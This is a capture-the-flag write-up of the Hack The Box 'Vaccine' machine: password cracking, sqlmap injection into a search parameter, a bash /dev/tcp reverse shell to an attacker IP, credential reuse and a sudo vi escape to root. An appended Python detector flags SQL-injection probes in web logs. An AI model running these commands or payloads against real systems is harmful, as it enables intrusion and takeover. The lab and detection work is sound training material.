[HTB] Vaccine

recon

  • nmap scan
    • cmd: nmap -sC -sV -A -oN nmap.log <Target-IP>
    • p21, p22 & p80 are open
    • anonymous FTP login is allowed on p21
  • found backup.zip on the FTP server; it is password protected
  • p80 hosts a website with a "MegaCorp Login" page

hacking

  • cracked the zip file password using John the Ripper
    • zip2john backup.zip > backup_pwd.hash
    • john --wordlist=/usr/share/wordlists/rockyou.txt backup_pwd.hash
    • john --show backup_pwd.hash
    • password: 741852963
  • unzipped the file
    • found index.php & style.css
    • found the website login creds in index.php, but the password is stored as an MD5 hash
      • admin:2cb42f8734ea607eefed3b70af13bbd3
    • password: qwerty789 (hash looked up on CrackStation)
  • logged in to the website on <Target-IP>
    • redirected to /dashboard.php
    • found an injectable parameter: /dashboard.php?search=
  • using sqlmap (the --os-shell option works here because the web app connects to PostgreSQL as the superuser account)
    • cmd: sqlmap -u "http://<Target-IP>/dashboard.php?search=" --cookie="PHPSESSID=5naq63b4fai8cobfeikbacjc21" --os-shell --batch
    • got a shell on the system!
  • we are now the postgres user
    • getting a reverse shell
      • nc -lvnp 4444 (attacker's machine)
      • bash -c "bash -i >& /dev/tcp/<Attacker-IP>/4444 0>&1" (sqlmap os-shell)
      • successfully got a reverse shell!
    • enumerating the system
      • found user: simon
      • found /var/lib/postgresql/user.txt > ec9b13ca4d6229cd5cc1e09980965bf7
  • privesc
    • found sensitive information (hardcoded database credentials) in /var/www/html/dashboard.php
      • $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
    • the same password is reused for the postgres system account, so it works for SSH access to the machine
    • sudo -l shows that /bin/vi /etc/postgresql/11/main/pg_hba.conf may be run with sudo
    • getting a root shell (vi's :shell escape spawns a shell with sudo's privileges)
      • sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
      • :shell
  • we are now the root user
    • found /root/root.txt > dd6e058e814260bc70e9bbdef2715849
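From the defender's side, the sqlmap step above leaves a very recognisable trail in the web server's access log. The following is an added example (not part of these notes) that flags SQL-injection probing of the /dashboard.php?search= parameter in Apache combined-format log lines; the log lines, IPs and timestamps are constructed for the example.

```python
"""Flag SQL-injection probing of dashboard.php's search parameter in Apache
combined-format access logs. Added example; the log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format: ip ident user [ts] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Syntax typical of automated injection probing against a text search field.
SQLI_RE = re.compile(
    r"('|\")\s*(and|or)\s+\d+\s*=\s*\d+|union\s+all\s+select|pg_sleep|--\s*$",
    re.IGNORECASE,
)

# Constructed sample log: one benign search, two boolean-based probes, a time-based probe.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dashboard.php?search=Elixir HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:07 +0000] "GET /dashboard.php?search=Elixir%27%20AND%201234%3D1234%20AND%20%27a%27%3D%27a HTTP/1.1" 200 1520 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.10.14.5 - - [01/Jan/2024:10:00:08 +0000] "GET /dashboard.php?search=Elixir%27%20AND%201234%3D1234%20AND%20%27a%27%3D%27a HTTP/1.1" 200 1520 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Jan/2024:10:01:02 +0000] "GET /dashboard.php?search=%27%3B%20SELECT%20pg_sleep%285%29--%20 HTTP/1.1" 200 1520 "-" "curl/8.0"
"""

def parse_line(line):
    """Parse one access-log line into a dict with decoded query params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return rec

def classify(rec):
    """Return the reasons a request looks like SQLi probing (empty list if benign)."""
    reasons = []
    if rec is None or rec["path"] != "/dashboard.php":
        return reasons
    if "sqlmap" in rec["ua"].lower():  # default user-agent is rarely changed
        reasons.append("sqlmap user-agent")
    if any(SQLI_RE.search(v) for v in rec["query"].get("search", [])):
        reasons.append("sql syntax in search=")
    return reasons

def scan(lines):
    """Map each source IP to the set of reasons it was flagged."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        reasons = classify(rec)
        if reasons:
            hits.setdefault(rec["ip"], set()).update(reasons)
    return hits

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG.splitlines()).items():
        print(ip, sorted(reasons))
```

The user-agent check alone is weak (sqlmap's --random-agent defeats it), which is why the payload pattern on the decoded parameter value is the part worth keeping in a real rule.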